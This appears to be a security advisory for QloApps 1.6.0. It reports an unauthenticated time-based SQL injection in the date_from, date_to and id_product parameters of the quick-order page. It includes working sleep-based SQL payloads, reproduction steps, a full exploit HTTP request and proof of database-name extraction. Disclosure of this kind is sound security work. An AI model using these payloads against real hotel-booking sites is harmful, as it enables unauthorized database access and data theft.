Affected Version: QloApps 1.6.0

Product Link: https://github.com/webkul/hotelcommerce

Security Issue:

(Unauthenticated) - Time Based SQL injection via GET parameter ?date_from, date_to, and id_product 

URL: <http://localhost/hotelcommerce/quick-order>
Method: GET
Vulnerable Parameters:
	date_from
	date_to
	id_product
	
Payload:	
	date_from=(select(0)from(select(sleep(5)))v)/*'%2B(select(0)from(select(sleep(4)))v)%2B'"%2B(select(0)from(select(sleep(4)))v)%2B"*/
	date_to=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
	id_product=(select(0)from(select(sleep(5)))v)

Vulnerability Description:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.

Process to reproduce:

1. Go to: <http://localhost/hotelcommerce/8-the-hotel-prime?date_from=2023-06-15&date_to=2023-06-16&occupancy%5B0%5D%5Badults%5D=1&occupancy%5B0%5D%5Bchildren%5D=0#hotelInteriorBlock>
2. Click "Book Now" then "Proceed to checkout"
3. Once redirected to quick-order
4. Use Burp Suite then use the above Payload for each Parameter
5. Check milis in Burp Suite to verify that it is vulnerable to Time Based SQL injection.

HTTP Request:


GET /hotelcommerce/quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PrestaShop-982ef6ed83d922bf6ce9ada599a2fd13=def502009cbd08e31224f80ac69a0864b64c4433d2766a286e27a1c01fd4c0d4313a57ed7b49b7d45766d002321202a4269de91e4a5cbe311d8631407b33b8334a7efc49bf7cb95136772b1c683a3d8ea5f73f3284fde66f6f789d19294b62367b4ece19cdf8cf90b4643c3812b2b2284ba9b9fe18e2efb0c43c699c05b612aa6eab0078428ba2863b01f6051df7925847edbfa9d2186e20db104457ece6168c0c96474435376d65b5687750d44676028cc578fecc742a5f5a1381525259974e277fcaa768c0c86abb270bb7a477d612bf4586f64a1d7740a53bc76c2b873ccdfa207bad79513b25320bce4deddec6d89f2b43a8ad8b470dc56860dd5c3df1e89f789a9000bce3ce44e83eecbb656ad030d8c876e2081710f487a9c5193c27066ffc413929a814945870126bd21b6824f78a101f1c6b001f82728280266e8bc31570097585782c4a5d965df0a1759679461814d6bf41791d5d8dc3871c2d47e488246359; PrestaShop-daf117f818c8eeecfa2bccccdd849a8c=def5020012f03c5bacd509bf07fcf72533f6e28e90a659272093b996ed642a412791b9bdd1de46cdfc1eeb771a2e202aa89d7bea536919156db6eb4f482e4b94b013ff2cfb6e7ec819528ea27cdea16ee65b2798e27eb696770a1497001186a765a97497858e3369ad0cda856b9ea81f2fdbaf2b75440c703978767d9a4bfb474d191172c9ed52dc7542405e784ea815c6c84dd8aea6215adb9fc5af757edcca73b0e2826b81c8413a22042dc01eaf479bd78b00ad47432c2f5330d1330c4d7258db220ee83c1c58f534ad813ac253ca1d07dd5888e327f70096a0da5ed33a8ff8263e73a069cad158ab4122a394587cce02566ced7237170b476507cb09da9bd7699b5eaea4c33447105ea2dc85c3
Connection: close

HTTP Response:

The application response with the Payload milis see image for confimation

Proof of Exploit:

SQL query - SELECT database()
qloapps

Screenshot:

sqli1.PNG

sqli2.PNG

sqli3.PNG